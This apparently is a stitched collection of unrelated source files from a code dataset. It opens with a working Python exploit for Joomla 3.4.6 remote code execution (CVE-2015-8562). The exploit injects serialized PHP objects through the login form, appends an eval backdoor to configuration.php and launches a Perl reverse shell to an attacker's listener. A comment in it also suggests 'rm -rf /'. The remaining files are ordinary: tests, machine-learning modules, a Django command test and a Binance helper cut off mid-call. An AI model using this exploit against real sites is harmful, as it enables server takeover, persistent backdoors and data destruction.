#payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def make_req(url , object_payload):
# just make a req with object
print_info('Getting Session Cookie ..')
cook = get_cook(url)
print_info('Getting CSRF Token ..')
csrf = get_token( url, cook)
user_payload = '\\0\\0\\0' * 9
padding = 'AAA' # It will land at this padding
working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
inj_object = '";'
inj_object += object_payload
inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
password_payload = padding + inj_object
params = {
'username': user_payload,
'password': password_payload,
'option':'com_users',
'task':'user.login',
csrf :'1'
}
print_info('Sending request ..')
resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)
return resp.text
def get_backdoor_pay():
# This payload will backdoor the the configuration .PHP with an eval on POST request
function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# payload = command + ' || $a=\'http://wtf\';'
# Following payload will append an eval() at the enabled of the configuration file
payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def check(url):
check_string = random_string(20)
target_url = url + 'index.php/component/users'
html = make_req(url, gen_pay('print_r',check_string))
if check_string in html:
return True
else:
return False
def ping_backdoor(url,param_name):
res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
if 'PWNED' in res.text:
return True
return False
def execute_backdoor(url, payload_code):
# Execute PHP code from the backdoor
res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
print(res.text)
def exploit(url, lhost, lport):
# Exploit the target
# Default exploitation will append en eval function at the end of the configuration.pphp
# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
# e.g. get_payload('system','rm -rf /')
# First check that the backdoor has not been already implanted
target_url = url + 'index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
print_info('Now it\'s time to reverse, trying with a system + perl')
execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target',required=True,help='Joomla Target')
parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
args = vars(parser.parse_args())
url = args['target']
if(check(url)):
print_ok('Vulnerable')
if args['exploit']:
exploit(url, args['lhost'], args['lport'])
else:
print_info('Use --exploit to exploit it')
else:
print_error('Seems NOT Vulnerable ;/')
| DawnFlame/POChouse | Joomla/Joomla 3.4.6-RCE(CVE-2015-8562)/Joomla-3.4.6-RCE.py | Joomla-3.4.6-RCE.py | py | 7,410 | python | en | code | 896 | github-code | 50 |
25329146087 | from pages.CheckoutCompletePage import CheckoutCompletePage
from pages.CheckoutInformationPage import CheckoutInformationPage
from pages.CheckoutOverviewPage import CheckoutOverviewPage
from pages.YourCart import YourCart
class Test_5:
def test_finalizar_compra(self, add_product_to_cart):
products_page = add_product_to_cart
products_page.open_cart()
your_cart = YourCart(driver=products_page.driver)
assert your_cart.is_your_cart_page(), "Your Cart page not found!"
item_price = your_cart.get_item_price()
your_cart.click_checkout()
checkout_page = CheckoutInformationPage(driver=your_cart.driver)
assert checkout_page.is_checkout_information_page(), "Checkout: Your Information page not found!"
checkout_page.insert_first_name()
checkout_page.insert_last_name()
checkout_page.insert_postal_code()
checkout_page.click_continue()
checkout_overview_page = CheckoutOverviewPage(driver=checkout_page.driver)
assert checkout_overview_page.has_same_price(item_price), "O valor do item não corresponde ao do carrinho!"
assert checkout_overview_page.has_a_payment_information_title(), "titulo das informações de pagamanetos não encontrado!"
assert checkout_overview_page.has_a_shipping_information_title(), "titulo das informações de envio não encontrado!"
assert checkout_overview_page.has_a_price_total_title(), "titulo do preço total não encontrado!"
assert checkout_overview_page.total_value_is_correct(), "Valor total não condiz com a soma do sub item e a taxa!"
checkout_overview_page.click_finish_btn()
checkout_complete_page = CheckoutCompletePage(driver=checkout_overview_page.driver)
assert checkout_complete_page.has_header_complete_msg(), 'Titulo incorreto'
assert checkout_complete_page.has_txt_complete_msg(), 'Mensagem de texto incorreto'
| WillamsPinto/ETA-TestesDeSistema | ETA2022.1/tests/test_5.py | test_5.py | py | 1,948 | python | pt | code | 0 | github-code | 50 |
553600491 | # Definition for a Node.
class Node(object):
def __init__(self, val, children):
self.val = val
self.children = children
class Solution(object):
def postorder(self, root):
"""
Given an n-ary tree, return the postorder traversal of its nodes' values.
For example, given a 3-ary tree:
Return its postorder traversal as: [5,6,3,2,4,1].
Note:
Recursive solution is trivial, could you do it iteratively?
:type root: Node
:rtype: List[int]
"""
if not root:
return []
stack = [root]
ans = []
while stack:
node = stack.pop()
if not node.children:
ans.append(node.val)
else:
stack.append(node.val)
for i in range(len(node.children)-1, -1, -1):
stack.append(node.children[i])
return ans
| ljia2/leetcode.py | solutions/tree/590.N-ary.Tree.Postorder.Traversal.py | 590.N-ary.Tree.Postorder.Traversal.py | py | 939 | python | en | code | 0 | github-code | 50 |
42217001137 | from gurobi_inference import Relation_Inference
from collections import Counter
import copy
def calculate_prob(class_counts, threshold=100):
total_counts = sum(class_counts)
if total_counts < threshold: return [0.0]*len(class_counts)
else: return [x / total_counts for x in class_counts]
def define_prior_constraints(prior_dist, relation_dictionaries, label_map_rel, threshold=100):
constraints = {}
for x in prior_dist:
if len(x) == 0: continue
event1, event2 = x
class_counts = [relation_dictionaries[0][(event1, event2)],
relation_dictionaries[1][(event1, event2)],
relation_dictionaries[2][(event1, event2)],
relation_dictionaries[3][(event1, event2)],
relation_dictionaries[4][(event1, event2)],
relation_dictionaries[5][(event1, event2)]]
prior = calculate_prob(class_counts, threshold)
if any(prior):
for l, v in label_map_rel.items():
if v == label_map_rel['NONE']: continue
constraints[(event1, event2, l)] = prior[v]
return constraints
def update_constraint_parameters(constraint_param, constraint_update, relation_pred_counter,
constraints, lr, tolerance, num_meet_tolerance, label_map_rel):
idx2label_rel = {v:k for k,v in label_map_rel.items()}
diff_list = []
prev_constraints = copy.deepcopy(constraint_param)
for ic, ((e1, e2, r), v) in enumerate(constraint_param.items()):
pair_rel_sum = sum([relation_pred_counter[(e1, e2, i)] for i in range(len(label_map_rel))])
current_ratio = relation_pred_counter[(e1, e2, r)] / pair_rel_sum
diff = constraints[(e1, e2, r)] - current_ratio
diff_list.append(((e1, e2, r), diff))
#print(e1, e2, idx2label_rel[r], relation_pred_counter[(e1, e2, r)],
# pair_rel_sum, current_ratio, diff)
if abs(diff) <= tolerance and constraint_update[(e1, e2, r)]:
num_meet_tolerance += 1
constraint_update[(e1, e2, r)] = False
if constraint_update[(e1, e2, r)]:
constraint_param[(e1, e2, r)] += lr * diff
print("Constraints", prev_constraints)
print("Diff", {k: round(x, 4) for k, x in diff_list})
print("num_meet_tolerance: %d" % num_meet_tolerance)
return constraint_param, constraint_update, num_meet_tolerance
def LROptimization(data, sample_event_types, labels, all_pairs, event_heads, label_map_rel,
constraints, lr=5.0, tolerance=0.10, decay=0.9, max_iter=20):
constraints = {(k[0], k[1], label_map_rel[k[2]]):v for k,v in constraints.items()}
constraint_param = {k: 0 for k in constraints}
constraint_update = {k: True for k in constraints}
num_meet_tolerance = 0
for itr in range(max_iter):
print("="*30, " Iteration #%s " %itr, "="*30)
correction_count = 0
relation_pred_counter = Counter()
constraint_perf = {k: [0, 0, 0, 0] for k in constraints}
M, Mc = data.shape
global_model = Relation_Inference(data, constraint_param, constraints, sample_event_types,
all_pairs, label_map_rel, event_heads)
global_model.run()
correction = global_model.predict()
correction_count += correction
print("Total relation corrections: %s" % correction_count)
preds = []
# relation global assignment
for m in range(M):
rel_pred = global_model.pred_rel_labels[m]
preds.append(rel_pred)
label = labels[m]
sample_event_type = sample_event_types[m]
if len(sample_event_type) == 0: continue
key = sample_event_types[m]
# merge Vague and None for ratio computation
if rel_pred == label_map_rel['NONE']: rel_pred = 0
if labels[m] == label_map_rel['NONE']: label = 0
relation_pred_counter[(key[0], key[1], rel_pred)] += 1
for k in constraint_perf:
if k == (key[0], key[1], label):
constraint_perf[k][0] += 1
if rel_pred == label:
constraint_perf[k][1] += 1
if k == (key[0], key[1], rel_pred):
constraint_perf[k][2] += 1
if rel_pred == label:
constraint_perf[k][3] += 1
constraint_param, constraint_update, num_meet_tolerance = \
update_constraint_parameters(constraint_param, constraint_update, relation_pred_counter,
constraints, lr, tolerance, num_meet_tolerance, label_map_rel)
#print(constraint_perf)
for triplet, perf in constraint_perf.items():
recall, precision, f1 = 0.0, 0.0, 0.0
if perf[0] > 0: recall = perf[1] / perf[0]
if perf[2] > 0: precision = perf[3] / perf[2]
if recall + precision > 0.0: f1 = 2*recall*precision / (recall+precision)
#print("(%s, %s, %s): recall: %.4f; precision: %.4f; f1: %.4f" % (triplet[0], triplet[1], triplet[2],
# recall, precision, f1))
lr *= decay
if num_meet_tolerance == len(constraints): break
return preds, num_meet_tolerance
| rujunhan/EMNLP-2020 | code/tbd/LROptimization.py | LROptimization.py | py | 5,906 | python | en | code | 6 | github-code | 50 |
16573502870 | import copy
from mindspore import Tensor
import mindspore as ms
import numpy as np
from .epsilon_schedules import DecayThenFlatSchedule
REGISTRY = {}
class MultinomialActionSelector():
def __init__(self, args):
self.args = args
self.schedule = DecayThenFlatSchedule(args.epsilon_start, args.epsilon_finish, args.epsilon_anneal_time,
decay="linear")
self.epsilon = self.schedule.eval(0)
self.test_greedy = getattr(args, "test_greedy", True)
def select_action(self, agent_inputs, avail_actions, t_env, test_mode=False):
masked_policies = agent_inputs.clone()
masked_policies[avail_actions == 0.0] = 0.0
self.epsilon = self.schedule.eval(t_env)
if test_mode and self.test_greedy:
picked_actions = masked_policies.max(dim=2)[1]
else:
picked_actions = Categorical(masked_policies).sample().long()
return picked_actions
REGISTRY["multinomial"] = MultinomialActionSelector
class EpsilonGreedyActionSelector():
def __init__(self, args):
self.args = args
self.schedule = DecayThenFlatSchedule(args.epsilon_start, args.epsilon_finish, args.epsilon_anneal_time,
decay="linear")
self.epsilon = self.schedule.eval(0)
def select_action(self, agent_inputs, avail_actions, t_env, test_mode=False):
# Assuming agent_inputs is a batch of Q-Values for each agent bav
self.epsilon = self.schedule.eval(t_env)
if test_mode:
# Greedy action selection only
self.epsilon = 0.0
# mask actions that are excluded from selection
masked_q_values = copy.deepcopy(agent_inputs)
if self.args.evaluate_310:
masked_q_values = masked_q_values.asnumpy()
avail_actions_np = avail_actions.asnumpy()
masked_q_values[avail_actions_np == 0.0] = -float("inf") # should never be selected!
masked_q_values = Tensor(masked_q_values, ms.float32)
else:
masked_q_values[avail_actions == 0.0] = -float("inf") # should never be selected!
shape = agent_inputs[:, :, 0].shape
random_numbers = Tensor(np.random.uniform(0, 1, shape), dtype=ms.float32)
pick_random = (random_numbers < self.epsilon).astype("int32")
random_actions = []
avail_actions = avail_actions.asnumpy()
for i in range(avail_actions.shape[1]):
pro = avail_actions[0, i, :].astype(np.float32) / avail_actions[0, i, :].sum()
random_actions.append(np.random.choice(range(avail_actions.shape[2]), 1, p=pro)[0])
random_actions = Tensor([random_actions], ms.int32)
picked_actions = pick_random * random_actions + (1 - pick_random) * masked_q_values.argmax(axis=2)
return picked_actions
REGISTRY["epsilon_greedy"] = EpsilonGreedyActionSelector
| allyouneeds/QMIX-MindSpore | qmix/ascend_src/components/action_selectors.py | action_selectors.py | py | 2,947 | python | en | code | 0 | github-code | 50 |
18553143692 | import numpy as np
import math
import matplotlib.pyplot as plt
def fun(x):
return 1/(25*(x**2) + 1)
'''
def myLagrange(xi: list, yi: list, data: list):
wyn = [0]*len(data)
for j in range(len(yi)):
wzr = yi[j]
for i in range(len(xi)):
if xi[i] - xi[j] != 0:
wzr *= (data - xi[i])/(xi[j] - xi[i])
wyn = wyn + wzr
return wyn
'''
def myLagrange(xi, yi):
def P(x):
ansP = 0
for i in range(len(xi)):
def wiel(i):
ans = 1
for j in range(len(xi)):
if xi[i] != xi[j]:
ans *= (x - xi[j])/(xi[i] - xi[j])
return ans
ansP += yi[i] * wiel(i)
return ansP
return P
def plot(f):
x = range(-10, 100)
y = map(f, x)
print (y)
plt.plot( x, y, linewidth=2.0)
data = np.linspace(-1, 1, 100)
k = np.linspace(-1, 1, 10)
knots = np.cos((math.pi*k)/10)
#knots = k
knots_value = fun(k)
P = myLagrange(knots, knots_value)
y = []
for i in data:
y.append(fun(i))
plt.plot(data, y)
#plot(P)
| WykwalifikowanyProgramista7000/Numerki | spyder/lab5.py | lab5.py | py | 1,209 | python | en | code | 0 | github-code | 50 |
27670261237 | import nlp
import torch
from numpy import mean
from transformers import PreTrainedTokenizerBase
from Code.Model.bert_embedder import TooManyTokens
from Code.Utils.dataset_utils import get_wikipoints
from Code.Utils.eval_utils import get_acc_and_f1
from Config.options import max_examples
_test = None
def get_test(tokeniser: PreTrainedTokenizerBase):
global _test
if _test is None:
_test = get_wikipoints(tokeniser, split=nlp.Split.VALIDATION)
print("num valid ex:", len(_test))
return _test
def evaluate(model):
test_set = get_test(model.bert.tokenizer)
answers = []
predictions = []
chances = []
model.eval()
with torch.no_grad():
for i, ex in enumerate(test_set):
if i >= max_examples != -1:
break
try:
_, pred_ans = model(ex)
except TooManyTokens as e:
continue
answers.append([ex.answer])
predictions.append(pred_ans)
chances.append(1./len(ex.candidates))
model.last_example = -1
valid_acc = get_acc_and_f1(answers, predictions)['exact_match']
print("eval completed. Validation acc:", valid_acc, "chance:", mean(chances))
return valid_acc
| shaneacton/GraphPerceiver | Code/Training/eval.py | eval.py | py | 1,252 | python | en | code | 0 | github-code | 50 |
75170123355 | import logging
from logging import config as logging_config
from secrets import token_hex
from typing import Optional
from core.config import CONFIG
class RequestIdFilter(logging.Filter):
"""A class for an additional log message filter to add request ID information to the log messages."""
def __init__(self, request_id: Optional[str]):
"""Initialize the class with an optional request ID.
Args:
request_id (str): Unique request identifier.
"""
self.request_id = request_id or token_hex(nbytes=16)
def filter(self, record: logging.LogRecord) -> bool:
"""Filter method for adding log information to a record.
Args:
record (logging.LogRecord): The record being processed.
Returns:
bool: True to log the record.
"""
record.request_id = self.request_id
return True
LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
LOG_DEFAULT_HANDLERS = ['console']
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': LOG_FORMAT,
},
'default': {
'()': 'uvicorn.logging.DefaultFormatter',
'fmt': '%(levelprefix)s %(message)s',
'use_colors': None,
},
'access': {
'()': 'uvicorn.logging.AccessFormatter',
'fmt': "%(levelprefix)s %(client_addr)s - '%(request_line)s' %(status_code)s",
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
},
'default': {
'formatter': 'default',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stdout',
},
'access': {
'formatter': 'access',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stdout',
},
'logstash': {
'class': 'logstash.LogstashHandler',
'level': 'INFO',
'host': CONFIG.logstash.host,
'port': CONFIG.logstash.port,
},
},
'loggers': {
'app': {
'handlers': ['logstash', 'console'],
'level': 'INFO',
},
'uvicorn.error': {
'level': 'INFO',
'handlers': ['logstash'],
},
'uvicorn.access': {
'handlers': ['access', 'logstash'],
'level': 'INFO',
'propagate': False,
},
},
'root': {
'level': 'INFO',
'formatter': 'verbose',
'handlers': LOG_DEFAULT_HANDLERS,
},
}
logging_config.dictConfig(LOGGING)
| temirovazat/cinemax-async-api | backend/src/core/logger.py | logger.py | py | 2,723 | python | en | code | 0 | github-code | 50 |
9108268634 |
import os
import time
"""
Graphics in the console with Python.
"""
class ConsoleDisplay:
def __init__(self, wt: int, ht: int, char='█'):
self.wt = wt
self.ht = ht
self.char = char
self.surfaceStr = char * wt
self.draw_coords = []
def draw_surface(self):
for i in range(self.ht):
self.surfaceStr = self.char * self.wt
for c in self.draw_coords:
if i == c[1]:
tempList = list(self.surfaceStr)
tempList[c[0]] = c[2]
self.surfaceStr = ''.join(tempList)
print(self.surfaceStr)
def draw_point(self, x, y, char):
self.draw_coords.append((x, y, char))
def clear(self):
self.draw_coords = []
def update(self):
os.system('CLS') # Clear screen command
WT, HT = 40, 10
displayInstance = ConsoleDisplay(WT, HT)
MAXFPS = 60
sTime = 0
x = 0
y = 0
speedX = 1
speedY = 1
while 1:
fTime = time.time()
displayInstance.draw_point(x, y, 'O')
displayInstance.draw_surface()
x += speedX
y += speedY
if y > HT - 1 or y < 0:
speedY *= -1
if x > WT - 2 or x < 0:
speedX *= -1
if sTime > 0:
time.sleep(sTime)
lTime = time.time()
dTime = lTime - fTime
sTime = 1 / MAXFPS - dTime
print(1 / dTime, x, y)
displayInstance.clear()
displayInstance.update()
| SeanJxie/practice-programs | SingleFilePython/console_screen.py | console_screen.py | py | 1,246 | python | en | code | 1 | github-code | 50 |
1706055791 | from torch.utils.data import Dataset
import os,sys
sys.path.append('../')
import settings
import torch
import pandas as pd
import numpy as np
import cv2
from PIL import Image
from imgaug import augmenters as iaa
from sklearn.model_selection import KFold
config=settings.config
np.random.seed(8)
def overSampling(train_df:pd.DataFrame):
train_df_orig=train_df.copy()
lows = [15,15,15,8,9,10,15,8,9,27,10,8,9,10,17,15,20,24,15,26,15,27,15,20,24,17,8,15,27,27,15,27]
for i in lows:
target = str(i)
indicies = train_df_orig.loc[train_df_orig['Target'] == target].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
indicies = train_df_orig.loc[train_df_orig['Target'].str.startswith(target+" ")].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
indicies = train_df_orig.loc[train_df_orig['Target'].str.endswith(" "+target)].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
indicies = train_df_orig.loc[train_df_orig['Target'].str.contains(" "+target+" ")].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
return train_df
def read_train_dataset_info():
path_to_train = config['path_to_train']
data = pd.read_csv(config['train_csv'])
data=overSampling(data)
train_dataset_info = []
for name, labels in zip(data['Id'], data['Target'].str.split(' ')):
train_dataset_info.append({
'path': os.path.join(path_to_train, name),
'labels': np.array([int(label) for label in labels])})
print("the kaggle data is ",len(train_dataset_info))
extra_path=config['extra_data']
extra_csv=pd.read_csv(config['extra_csv'])
extra_csv=overSampling(extra_csv)
for name,labels in zip(extra_csv['Id'],extra_csv['Target'].str.split(' ')):
path=os.path.join(extra_path,name)
if os.path.exists(path+"_red.png") and os.path.exists(path+"_yellow.png") \
and os.path.exists(path+"_green.png") and os.path.exists(path+"_blue.png"):
train_dataset_info.append({
'path':os.path.join(extra_path,name),
'labels':np.array([int(label) for label in labels ])
})
print("the kaggle + extra data is ",len(train_dataset_info))
train_dataset_info = np.array(train_dataset_info)
return train_dataset_info
def statistic_class_imbalance():
train_data_info=read_train_dataset_info()
labels=np.zeros((28,),dtype=np.int32)
for data in train_data_info:
labels[data['labels']]+=1
kf=KFold(n_splits=5,random_state=8,shuffle=True)
last_train=[]
for train,test in kf.split(train_data_info):
print(train,len(train),np.all(train==last_train))
last_train=train.copy()
class DataLoad_protein(Dataset):
def __init__(self,dataset_info=None, batch_size=None, shape=None, augument=True):
super(DataLoad_protein, self).__init__()
assert shape[2]==4
self.dataset_info=dataset_info
self.batch_size=batch_size
self.shape=shape
self.augument=augument
def __len__(self):
return len(self.dataset_info)
def __getitem__(self, item):
if item>len(self.dataset_info):
item%=len(self.dataset_info)
while True:
path=self.dataset_info[item]['path']
if os.path.exists(path+"_red.png") and os.path.exists(path+"_yellow.png") and os.path.exists(path+"_green.png") and os.path.exists(path+"_blue.png"):
image=self.load_image(path,self.shape)
break
else:
print("the image is not exist",path)
item+=1
item%=len(self.dataset_info)
if self.augument:
image = self.augment(image)
label=np.zeros(shape=(28,))
label[self.dataset_info[item]['labels']]=1
image=image/255.#归一化
image=np.transpose(image,(2,0,1)).copy()
return torch.from_numpy(image),torch.FloatTensor(label)
def load_image_extra_data(self,path,shape):
image=Image.open("path")
print(np.array(image.shape))
def load_image(self,path,shape):
image_red_ch = Image.open(path + '_red.png')
image_yellow_ch = Image.open(path + '_yellow.png')
image_green_ch = Image.open(path + '_green.png')
image_blue_ch = Image.open(path + '_blue.png')
image = np.stack((
np.array(image_red_ch),
np.array(image_green_ch),
np.array(image_blue_ch),
np.array(image_yellow_ch)), -1)
image = cv2.resize(image, (shape[0], shape[1]))
return image
def augment(self,image):
augment_img = iaa.Sequential([
iaa.OneOf([
iaa.Affine(rotate=0),
iaa.Affine(rotate=90),
iaa.Affine(rotate=180),
iaa.Affine(rotate=270),
iaa.Fliplr(0.5),
iaa.Flipud(0.5),
])], random_order=True)
image_aug = augment_img.augment_image(image)
return image_aug
if __name__ == '__main__':
statistic_class_imbalance() | espectre/kaggle_Human-Protein-Atlas-Image-Classification | pytorch/Data.py | Data.py | py | 5,423 | python | en | code | 0 | github-code | 50 |
12091392547 | fav1 = ['pizza', 'nuggets', 'hotdog', 'noodles', 'pasta', 'burger']
fav2 = ['burger', 'hotdog', 'noodles', 'pasta', 'nuggets', 'pizza']
# find the min sum of indices for corresponding food in fav1 and fav2
# for example, pizza is at index 0 in fav1 and at index 5 in fav2
# so the sum of indices for pizza is 5
index1 = len(fav1)
index2 = len(fav2)
favourite_food = None
for i1 in range(index1):
i2 = fav2.index(fav1[i1])
if i1 + i2 < index1 + index2:
index1 = i1
index2 = i2
favourite_food = fav1[i1]
print(favourite_food, index1 + index2)
| Altmerian/learn-python | lists/favourite_food.py | favourite_food.py | py | 579 | python | en | code | 0 | github-code | 50 |
11661296522 | """Test suite for the management command sync_group_permissions."""
from django.core.management import call_command
from django.test import TestCase, override_settings
from machina.apps.forum_permission.shortcuts import assign_perm
from machina.core.db.models import get_model
from ashley.factories import ForumFactory, LTIContextFactory
from ashley.machina_extensions.forum.models import AbstractForum
from ashley.models import AbstractLTIContext
GroupForumPermission = get_model(
"forum_permission", "GroupForumPermission"
) # pylint: disable=C0103
class TestSyncGroupPermissionsCommand(TestCase):
"""Test the sync_group_permissions management command."""
def setUp(self):
super().setUp()
# Instanciate factories
self.lti_context_factory = LTIContextFactory
self.forum_factory = ForumFactory
def test_command(self):
"""Check the sync_group_permission behavior."""
# Create a LTI context and a forum
lti_context: AbstractLTIContext = self.lti_context_factory.create()
forum: AbstractForum = self.forum_factory.create()
forum.lti_contexts.add(lti_context)
# Setup a group for the LTI role `instructor` with some initial permissions
instructor_group = lti_context.get_role_group("instructor")
assign_perm("can_see_forum", instructor_group, forum)
assign_perm("can_read_forum", instructor_group, forum)
# Setup a group for the LTI role `another_role` with some initial permissions
another_group = lti_context.get_role_group("another_role")
assign_perm("can_see_forum", another_group, forum)
assign_perm("can_read_forum", another_group, forum)
assign_perm("can_approve_posts", another_group, forum)
# Check that our groups have the expected initial permissions
self.assertEqual(
["can_see_forum", "can_read_forum"],
self._get_group_forum_permissions(instructor_group, forum),
)
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
with override_settings(
ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS={
"instructor": ["can_see_forum", "can_lock_topics"]
}
):
# Run the command without argument
call_command("sync_group_permissions")
# By default, the command is in dry-run mode, so it should not have done anything
# in database.
self.assertEqual(
["can_see_forum", "can_read_forum"],
self._get_group_forum_permissions(instructor_group, forum),
)
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
# Run the command with the --apply argument, to execute real database updates
call_command("sync_group_permissions", "--apply")
# Check that missing groups have been added to our instructor group, according to
# the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting
self.assertEqual(
["can_see_forum", "can_read_forum", "can_lock_topics"],
self._get_group_forum_permissions(instructor_group, forum),
)
# another_group should have its initial permissions, since it's
# not mentionned in the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting.
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
# Run the command with the --remove-extra-permissions to revoke group
# permissions that are not defined in the settings
call_command(
"sync_group_permissions", "--apply", "--remove-extra-permissions"
)
# Check that extra groups have been revoked from instructor group, according to
# the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting
self.assertEqual(
["can_see_forum", "can_lock_topics"],
self._get_group_forum_permissions(instructor_group, forum),
)
# another_group should have its initial permissions, since it's
# not mentionned in the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting.
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
@staticmethod
def _get_group_forum_permissions(group, forum):
return list(
GroupForumPermission.objects.filter(
forum=forum, group=group, has_perm=True
).values_list("permission__codename", flat=True)
)
| openfun/ashley | tests/ashley/management/commands/test_sync_group_permissions.py | test_sync_group_permissions.py | py | 5,009 | python | en | code | 11 | github-code | 50 |
10418957717 | from datetime import datetime, timedelta
import pandas as pd
from binance.client import Client as BinanceClient
from utils.secrets import get_binance_secret
interval_mapping = {
"1MINUTE": BinanceClient.KLINE_INTERVAL_1MINUTE,
"3MINUTE": BinanceClient.KLINE_INTERVAL_3MINUTE,
"5MINUTE": BinanceClient.KLINE_INTERVAL_5MINUTE,
"15MINUTE ": BinanceClient.KLINE_INTERVAL_15MINUTE,
"30MINUTE ": BinanceClient.KLINE_INTERVAL_30MINUTE,
"1HOUR": BinanceClient.KLINE_INTERVAL_1HOUR,
"2HOUR": BinanceClient.KLINE_INTERVAL_2HOUR,
"4HOUR": BinanceClient.KLINE_INTERVAL_4HOUR,
"6HOUR": BinanceClient.KLINE_INTERVAL_6HOUR,
"8HOUR": BinanceClient.KLINE_INTERVAL_8HOUR,
"12HOUR ": BinanceClient.KLINE_INTERVAL_12HOUR ,
"1DAY": BinanceClient.KLINE_INTERVAL_1DAY,
"3DAY": BinanceClient.KLINE_INTERVAL_3DAY,
"1WEEK": BinanceClient.KLINE_INTERVAL_1WEEK,
"1MONTH": BinanceClient.KLINE_INTERVAL_1MONTH
}
def _get_client():
try:
client = BinanceClient(*get_binance_secret())
except Exception:
raise
else:
return client
def BinanceDataFrame(klines):
asset = pd.DataFrame(klines,dtype=float, columns = (
'Open Time',
'Open',
'High',
'Low',
'Close',
'Volume',
'Close time',
'Quote asset volume',
'Number of trades',
'Taker buy base asset volume',
'Taker buy quote asset volume',
'Ignore'))
asset['Datetime'] = pd.to_datetime(asset['Open Time'], unit='ms')
asset.reset_index(drop=True, inplace=True)
asset = asset.set_index('Datetime')
return asset
def get_usdt_tickers(coins: list = None) -> list:
"""
:param Client: Binance Client instance
:param coins: A list of coin tickers
:return list: a list of USDT based tickers given a list of coin tickers
"""
client = _get_client()
if not isinstance(coins, list):
raise Exception('coins argument should be a list')
try:
all_ticker = client.get_all_tickers()
except Exception as e:
raise
usd_tickers = []
ticker_response = []
for ticker in all_ticker:
if ticker.get('symbol').endswith('USDT'):
usd_tickers.append(ticker.get('symbol'))
if not coins:
return usd_tickers
for ticker in usd_tickers:
for coin in coins:
if ticker.startswith(coin):
if _is_usdt_valid(coin, ticker):
ticker_response.append(ticker)
return ticker_response
def get_portfolio_data(tickers,
start_date,
end_date=None,
interval="1DAY"):
"""
Example date format: December 1, 2021 UTC
Example timestamp date format:
dt_string = '18/09/19 01:55:19'
dt = datetime. strptime(dt_string, '%d/%m/%y %H:%M:%S')
start = int(dt.timestamp() * 1000)
Intervals: "1MINUTE", "3MINUTE", "5MINUTE", "15MINUTE ", "30MINUTE ",
"1HOUR", "2HOUR", "4HOUR", "6HOUR", "8HOUR",
"12HOUR ", "1DAY", "3DAY", "1WEEK", "1MONTH
Default interval: "1DAY"
"""
client = _get_client()
tickers = get_usdt_tickers(tickers)
if not isinstance(tickers, list):
raise Exception(f"Invalid ticker format, should be list got {type(tickers)}")
interval = interval_mapping.get(interval)
if not interval:
interval = interval_mapping["1DAY"]
portfolio = pd.DataFrame()
try:
for asset in tickers:
klines = client.get_historical_klines(
symbol=asset,
interval=interval,
